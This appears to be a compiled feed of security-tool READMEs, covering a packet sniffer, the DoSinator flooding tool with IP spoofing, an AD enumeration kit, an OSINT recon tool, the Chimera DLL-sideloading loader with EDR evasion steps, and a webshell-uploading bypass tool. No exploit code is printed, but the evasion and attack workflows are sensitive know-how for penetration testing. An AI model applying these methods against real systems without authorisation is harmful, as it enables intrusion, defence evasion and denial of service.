  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  2. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.
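
The core of such a sniffer takes only a few lines of scapy; here is a minimal sketch (illustrative, not ICMPWatch itself), assuming the "eth0" interface from the examples below:

# minimal ICMP sniffing sketch with scapy (illustrative, not ICMPWatch itself)
from scapy.all import ICMP, IP, sniff

def show(pkt):
    if pkt.haslayer(ICMP) and pkt.haslayer(IP):
        print(f"{pkt[IP].src} -> {pkt[IP].dst} type={pkt[ICMP].type}")

sniff(iface="eth0", filter="icmp", prn=show)  # press Ctrl+C to stop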

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python icmpwatch.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving captured packets to a pcap file:
python icmpwatch.py -i eth0 -c captured_packets.pcap


DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats. 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http, dns (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



Temcrypt - Evolutionary Encryption Framework Based On Scalable Complexity Over Time

By: Zion3R


The Next-gen Encryption

Try temcrypt on the Web →

temcrypt SDK

Focused on protecting highly sensitive data, temcrypt is an advanced multi-layer data evolutionary encryption mechanism that offers scalable complexity over time, and is resistant to common brute force attacks.

You can create your own applications, scripts and automations when deploying it.

Knowledge

Find out what temcrypt stands for, the features and inspiration that led me to create it, and much more. READ THE KNOWLEDGE DOCUMENT. This is very important for you.


Compatibility

temcrypt is compatible with both Node.js v18 or later and modern web browsers, allowing you to use it in various environments.

Getting Started

The only dependencies temcrypt uses are crypto-js, for handling encryption algorithms like AES-256 and SHA-256 and some encoders, and fs, which is used for file handling with Node.js.

To use temcrypt, you need to have Node.js installed. Then, you can install temcrypt using npm:

npm install temcrypt

After that, import it in your code as follows:

const temcrypt = require("temcrypt");

temcrypt includes an auto-install feature for its dependencies, so you don't have to worry about installing them manually. Just run the temcrypt.js library and the dependencies will be installed automatically, then call it in your code; this was done to make it portable:

node temcrypt.js

Alternatively, you can use temcrypt directly in the browser by including the following script tag:

<script src="temcrypt.js"></script>

or minified:

<script src="temcrypt.min.js"></script>

You can also call the library on your website or web application from a CDN:

<script src="https://cdn.jsdelivr.net/gh/jofpin/temcrypt/temcrypt.min.js"></script>

Usage

ENCRYPT & DECRYPT

temcrypt provides functions like encrypt and decrypt to securely protect and disclose your information.

Parameters

  • dataString (string): The string data to encrypt.
  • dataFiles (string): The file path to encrypt. Provide either dataString or dataFiles.
  • mainKey (string): The main key (private) for encryption.
  • extraBytes (number, optional): Additional bytes to add to the encryption. This optional parameter of the temcrypt encryption process lets you add extra bytes to the encrypted data, increasing the complexity of the encryption, which requires more processing power to decrypt. It also helps break up patterns by changing the weight of the encryption.

Returns

  • If successful:
    • status (boolean): true to indicate successful decryption.
    • hash (string): The unique hash generated to verify the legitimacy of the encrypted data.
    • dataString (string) or dataFiles: The decrypted string or the file path of the decrypted file, depending on the input.
    • updatedEncryptedData (string): The updated encrypted data after decryption. Every time the encryption is decrypted, the output is updated, because the mainKey changes its order and the new date of last decryption is saved.
    • creationDate (string): The creation date of the encrypted data.
    • lastDecryptionDate (string): The date of the last successful decryption of the data.
  • If dataString is provided:
    • hash (string): The unique hash generated to verify the legitimacy of the encrypted data.
    • mainKey (string): The main key (private) used for encryption.
    • timeKey (string): The time key (private) of the encryption.
    • dataString (string): The encrypted string.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If dataFiles is provided:
    • hash (string): The unique hash generated to verify the legitimacy of the encrypted data.
    • mainKey (string): The main key used for encryption.
    • timeKey (string): The time key of the encryption.
    • dataFiles (string): The file path of the encrypted file.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If decryption fails:
    • status (boolean): false to indicate decryption failure.
    • error_code (number): An error code indicating the reason for decryption failure.
    • message (string): A descriptive error message explaining the decryption failure.

Here are some examples of how to use temcrypt. Please note that when encrypting, you must enter a key and record the hour and minute at which you encrypted the information. To decrypt the information, you must use the same main key at the same hour and minute on subsequent days:

Encrypt a String

const dataToEncrypt = "Sensitive data";
const mainKey = "your_secret_key"; // Insert your custom key

const encryptedData = temcrypt.encrypt({
  dataString: dataToEncrypt,
  mainKey: mainKey
});

console.log(encryptedData);

Decrypt a String

const encryptedData = "..."; // Encrypted data obtained from the encryption process
const mainKey = "your_secret_key";

const decryptedData = temcrypt.decrypt({
  dataString: encryptedData,
  mainKey: mainKey
});

console.log(decryptedData);
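Because decrypt reports failures through the documented status, error_code, and message fields rather than throwing (see Returns above), a minimal result-handling sketch could be:

if (decryptedData.status) {
  console.log("Decrypted:", decryptedData.dataString);
} else {
  console.error("Decryption failed (" + decryptedData.error_code + "): " + decryptedData.message);
}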

Encrypt a File:

To encrypt a file using temcrypt, you can use the encrypt function with the dataFiles parameter. Here's an example of how to encrypt a file and obtain the encryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt";
const mainKey = "your_secret_key";

const result = temcrypt.encrypt({
  dataFiles: filePath,
  mainKey: mainKey,
  extraBytes: 128 // Optional: Add 128 extra bytes
});

console.log(result);

In this example, replace 'test.txt' with the actual path to the file you want to encrypt and set 'your_secret_key' as the main key for the encryption. The result object will contain the encryption details, including the unique hash, main key, time key, and the file path of the encrypted file.

Decrypt a File:

To decrypt a file that was previously encrypted with temcrypt, you can use the decrypt function with the dataFiles parameter. Here's an example of how to decrypt a file and obtain the decryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt.trypt";
const mainKey = "your_secret_key";

const result = temcrypt.decrypt({
  dataFiles: filePath,
  mainKey: mainKey
});

console.log(result);

In this example, replace 'path/test.txt.trypt' with the actual path to the encrypted file, and set 'your_secret_key' as the main key for decryption. The result object will contain the decryption status and the decrypted data, if successful.

Remember to provide the correct main key used during encryption, at the exact same hour and minute at which the file was encrypted, to successfully decrypt it. If the main key is wrong, the file was tampered with, or the time is wrong, the decryption status will be false and the decrypted data will not be available.


UTILS

temcrypt provides utils functions to perform additional operations beyond encryption and decryption. These utility functions are designed to enhance the functionality and usability.

Function List:

  1. changeKey: Change your encryption mainKey
  2. check: Check if the encryption belongs to temcrypt
  3. verify: Checks if a hash matches the legitimacy of the encrypted output.

Below, you can see the details and how to implement its uses.

Update MainKey:

The changeKey utility function allows you to change the mainKey used to encrypt the data while keeping the encrypted data intact. This is useful when you want to enhance the security of your encrypted data or update the mainKey periodically.

Parameters

  • dataFiles (optional): The path to the file that was encrypted using temcrypt.
  • dataString (optional): The encrypted string that was generated using temcrypt.
  • mainKey (string): The current mainKey used to encrypt the data.
  • newKey (string): The new mainKey that will replace the current mainKey.

const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const currentMainKey = "my_recent_secret_key";
const newMainKey = "new_recent_secret_key";

// Update mainKey for the encrypted file
const result = temcrypt.utils({
  changeKey: {
    dataFiles: filePath,
    mainKey: currentMainKey,
    newKey: newMainKey
  }
});

console.log(result.message);

Check Data Integrity:

The check utility function allows you to verify the integrity of data encrypted using temcrypt. It checks whether a file or a string is valid temcrypt encrypted data.

Parameters

  • dataFiles (optional): The path to the file that you want to check.
  • dataString (optional): The encrypted string that you want to check.

const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const encryptedString = "..."; // Encrypted string generated by temcrypt

// Check the integrity of the encrypted File
const result = temcrypt.utils({
  check: {
    dataFiles: filePath
  }
});

console.log(result.message);

// Check the integrity of the encrypted String
const result2 = temcrypt.utils({
  check: {
    dataString: encryptedString
  }
});

console.log(result2.message);

Verify Hash:

The verify utility function allows you to verify the integrity of encrypted data using its hash value. Checks if the encrypted data output matches the provided hash value.

Parameters

  • hash (string): The hash value to verify against.
  • dataFiles (optional): The path to the file whose hash you want to verify.
  • dataString (optional): The encrypted string whose hash you want to verify.

const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const encryptedString = "..."; // Encrypted string generated by temcrypt (used in the second example below)
const hashToVerify = "..."; // The hash value to verify

// Verify the hash of the encrypted File
const result = temcrypt.utils({
  verify: {
    hash: hashToVerify,
    dataFiles: filePath
  }
});

console.log(result.message);

// Verify the hash of the encrypted String
const result2 = temcrypt.utils({
  verify: {
    hash: hashToVerify,
    dataString: encryptedString
  }
});

console.log(result2.message);

Error Codes

The following table presents the important error codes and their corresponding error messages used by temcrypt to indicate various error scenarios.

Code | Error Message | Description
420 | Decryption time limit exceeded | The decryption process took longer than the allowed time limit.
444 | Decryption failed | The decryption process encountered an error.
777 | No data provided | No data was provided for the operation.
859 | Invalid temcrypt encrypted string | The provided string is not a valid temcrypt encrypted string.

Examples

Check out the examples directory for more detailed usage examples.

WARNING

The encryption size of a string or file should be less than 16 KB (kilobytes). If it's larger, you must have enough computational power to decrypt it. Otherwise, your personal computer will exceed the time required to find the correct main key combination and proper encryption formation, and it won't be able to decrypt the information.

TIPS

  1. With temcrypt, you can only decrypt your information on later days with the key you entered, at the same hour and minute at which you encrypted it.
  2. Focus on timing: it is recommended to start the decryption within the first 2 to 10 seconds, so you have an advantage in generating the correct key formation.

License

The content of this project itself is licensed under the Creative Commons Attribution 3.0 license, and the underlying source code used to format and display that content is licensed under the MIT license.

Copyright (c) 2023 by Jose Pino



AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment

By: Zion3R


Description

Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.

The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper authorization and permission before using these scripts in any production environment.

Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî


Features

  • Enumerate and gather information about AD domains, users, groups, and computers.
  • Check trust relationships between domains.
  • List all objects inside a specific Organizational Unit (OU).
  • Retrieve information about the currently logged-in user.
  • Perform various operations related to local users and groups.
  • Configure firewall rules and enable Remote Desktop (RDP).
  • Connect to remote machines using RDP.
  • Gather network and security information.
  • Check Windows Defender status and exclusions configured via GPO.
  • ...and more!
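As a flavor of what such enumeration looks like, here is a hedged PowerShell sketch built on the standard ActiveDirectory module (illustrative only, not necessarily the toolkit's own implementation; the OU path is a placeholder):

Import-Module ActiveDirectory

# Enumerate the current domain and its trust relationships
Get-ADDomain | Select-Object Name, DomainMode, PDCEmulator
Get-ADTrust -Filter * | Select-Object Name, Direction, TrustType

# List all objects inside a specific Organizational Unit (OU)
Get-ADObject -SearchBase "OU=Workstations,DC=example,DC=com" -Filter *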

Usage

  1. Clone the repository or download the scripts as needed.
  2. Run the PowerShell script using the appropriate PowerShell environment.
  3. Follow the on-screen prompts to provide domain, username, and password when required.
  4. Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!

Disclaimer

The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.

License

This project is licensed under the MIT License. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.

Cyber Security Consultant

Alperen Ugurlu



Bryobio - NETWORK Pcap File Analysis

By: Zion3R


Bryobio is a network PCAP file analysis tool. It was developed to speed up the workflow of SOC analysts during analysis.


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

INSTALLATION INSTRUCTIONS

$ git clone https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries, and also to perform code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.


Features

  • AI Cybersecurity Chat: HackBot can answer various cybersecurity-related queries, helping you with penetration testing, security analysis, and more.
  • Interactive Interface: The chatbot provides an interactive command-line interface, making it easy to have conversations with HackBot.
  • Clear Output: HackBot presents its responses in a well-formatted markdown, providing easily readable and organized answers.
  • Static Code Analysis: Utilizes the provided scan data or log file for conducting static code analysis. It thoroughly examines the source code without executing it, identifying potential vulnerabilities, coding errors, and security issues.
  • Vulnerability Analysis: Performs a comprehensive vulnerability analysis using the provided scan data or log file. It identifies and assesses security weaknesses, misconfigurations, and potential exploits present in the target system or network.

How it looks

Chat:

Static Code analysis:

Vulnerability analysis:

Installation

Prerequisites

Before you proceed with the installation, ensure you have the following prerequisites:

Step 1: Clone the Repository

git clone https://github.com/morpheuslord/hackbot.git
cd hackbot

Step 2: Install Dependencies

pip install -r requirements.txt

Step 3: Download the AI Model

python hackbot.py

The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.
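As an illustration of what loading that model looks like, here is a minimal sketch using the llama-cpp-python binding (assuming a version that still reads GGML files; this is not HackBot's exact code):

from llama_cpp import Llama

# Load the model file HackBot downloads on first run
llm = Llama(model_path="llama-2-7b-chat.ggmlv3.q4_0.bin")
out = llm("Explain SQL injection briefly.", max_tokens=128)
print(out["choices"][0]["text"])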

Usage

To start a conversation with HackBot, run the following command:

python hackbot.py

HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.

Here are some additional commands you can use:

  • clear_screen: Clears the console screen for better readability.
  • quit_bot: Quits the chat application.
  • bot_banner: Prints the default bot banner.
  • contact_dev: Provides my contact information.
  • save_chat: Saves the current session's interactions.
  • vuln_analysis: Performs a vulnerability analysis using the scan data or log file.
  • static_code_analysis: Performs a static code analysis using the scan data or log file.

Note: I am working on more add-ons and similar commands to provide a more ChatGPT-like experience.

Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.

I am also working on AI training, through which I can tune it more accurately to work for hackers at a much more professional level.

Contributing

We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:

  1. Fork the repository.
  2. Create a new branch with a descriptive name.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request to the main branch of this repository.

Please maintain a clean commit history and adhere to the project's coding guidelines.

AI training

If you have the know-how to train text-generation models, your help in improving the code is welcome.

Contact

For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:



InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

By: Zion3R


During the reconnaissance phase, an attacker searches for any information about the target to create a profile that will later help identify possible ways to get into an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and URLs that will later be analyzed to extract even more valuable information.


Infohound architecture

Installation

git clone https://github.com/xampla/InfoHound.git
cd InfoHound/infohound
mv infohound_config.sample.py infohound_config.py
cd ..
docker-compose up -d

You must add API keys inside the infohound_config.py file

Default modules

InfoHound has 2 different types of modules: those which retrieve data and those which analyze it to extract more relevant information.

Retrieval modules

  • Get Whois Info: Get relevant information from the Whois register.
  • Get DNS Records: This task queries the DNS.
  • Get Subdomains: This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
  • Get Subdomains From URLs: Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
  • Get URLs: It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
  • Get Files from URLs: It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar.
  • Find Email: It looks for emails using queries to Google and Bing.
  • Find People from Emails: Once some emails have been found, it can be useful to discover the person behind them. It also finds usernames for those people.
  • Find Emails From URLs: Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
  • Execute Dorks: It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
  • Find Emails From Dorks: By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

Analysis

  • Check Subdomains Take-Over: It performs some checks to determine if a subdomain can be taken over.
  • Check If Domain Can Be Spoofed: It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
  • Get Profiles From Usernames: This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
  • Download All Files: Once files have been stored in the Files database table, this task will download them to the "download_files" folder.
  • Get Metadata: Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
  • Get Emails From Metadata: As some metadata can contain emails, this task will retrieve all of them and save them to the database.
  • Get Emails From Files Content: Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
  • Find Registered Services using Emails: It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
  • Check Breach: This task checks the Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If a Leak-Lookup API key is set, it also checks it.

Custom modules

InfoHound lets you create custom modules; you just need to add your script inside infohound/tool/custom_modules. One custom module has been added as an example, which uses the Holehe tool to check if the previously discovered emails are attached to accounts on sites like Twitter, Instagram, Imgur and more than 120 others.

Inspired by



Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R


While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created: a tool that includes evasion methodologies to bypass EDR/AV products. The tool can automatically encrypt a shellcode via XOR with a random key and create template files that can be imported into Visual Studio to build a malicious DLL.

Dynamic syscalls from SysWhispers2 are also used, with a modified assembly version to evade the patterns that EDRs search for; random NOP sleds are added and registers are shuffled. Furthermore, Early Bird injection is used to inject the shellcode into another process, which the user can specify, along with sandbox evasion mechanisms such as a hard-disk check and a check for whether the process is being debugged. Finally, a timing attack is placed in the loader, which uses waitable timers to delay execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.
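Of the techniques above, the XOR layer is the simplest to illustrate. Below is a generic Python sketch of repeating-key XOR with a random key (an illustration of the concept only, not Chimera's actual code):

import os

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR; applying it twice with the same key decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = os.urandom(16)                         # random key, as the description states
encrypted = xor_bytes(b"\x90\x90\xcc", key)  # placeholder shellcode bytes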


Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.

Someone can create userenv.dll, which is a DLL missing from Microsoft Teams, and insert it into the following folder:

%USERPROFILE%/Appdata/local/Microsoft/Teams/current

For Microsoft OneDrive, the script uses version.dll, which is commonly missing from binaries such as onedriveupdater.exe

Chimera Usage.

python3 ./chimera.py met.bin chimera_automation notepad.exe teams

python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Usefull Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.
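For example, from a Windows command prompt (file names taken from the paragraph above):

ren userenv.dll tmpB0F7.dll
ren version.dll tmp44BC.dll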

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project. 

 

Step 2: Importing Images into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary files.
  2. Open the folder and identify the following files: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_files" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_files" folder of the "chimera_automation" directory.
  7. Right-click on the "header_files" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.

 

Step 5:

  1. Right click in the assembly file → properties and choose the following
  2. Exclude from build → No
  3. Content → Yes
  4. Item type → Microsoft Macro Assembler


Final Project Setup


Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project → properties
  2. C/C++ Optimization and change to the following

 

Step 2: Remove Debug Information

  1. In Visual Studio choose Project → properties
  2. Linker → Debugging → Generate Debug Info → No


Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

References

https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection

https://evasions.checkpoint.com/

https://github.com/Flangvik/SharpDllProxy

https://github.com/jthuraisamy/SysWhispers2

https://systemweakness.com/on-disk-detection-bypass-avs-edr-s-using-syscalls-with-legacy-instruction-series-of-instructions-5c1f31d1af7d

https://github.com/Mr-Un1k0d3r



Upload_Bypass - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques Covered In Hacktricks

By: Zion3R


Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

  • Simplifies the identification and exploitation of vulnerabilities in file upload mechanisms.
  • Leverages bug bounty techniques to maximize testing effectiveness.
  • Enables thorough assessments of web applications.
  • Provides an intuitive and user-friendly interface.
  • Enhances security assessments and helps protect critical systems.

New PoC Video:

Disclaimer

Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.

While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.

The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.

By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.

Features

  1. Webshell mode: The tool will try to upload a Webshell with a random name, and if the user specifies the location of the uploaded file, the tool enters an "Interactive shell".
  2. Eicar mode: The tool will try to upload an Eicar(Anti-Malware test file) instead of a Webshell, and if the user specifies the location of the uploaded file, the tool will check if the file uploaded successfully and exists in the system in order to determine if an Anti-Malware is present on the system.
  3. A directory with the name of the tested host will be created in the Tool's directory upon success, with the results saved in Excel and Text files.

Download:

Download the latest version from Releases page.

Installation:

pip install -r requirements.txt

Limitations:

The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.

Perhaps in the future the tool will include an OCR.

Usage:

Attention

The tool is compatible exclusively with request output files generated by Burp Suite.

Before saving the Burp file, replace the file content with the string *content*, the filename.ext with the string *filename*, and the Content-Type header value with *mimetype* (only if the tool is not able to recognize it automatically).

How a request should look before the changes:


How it should look after the changes:


If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.
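Since the before/after screenshots are not reproduced here, this is a hedged sketch of the relevant multipart section of the saved Burp request after the substitutions (the boundary and field name are illustrative):

------WebKitFormBoundaryAbC123
Content-Disposition: form-data; name="file"; filename="*filename*"
Content-Type: *mimetype*

*content*
------WebKitFormBoundaryAbC123--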

Options: -h, --help

 show this help message and exit

-b BURP_FILE, --burp-file BURP_FILE

 Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output

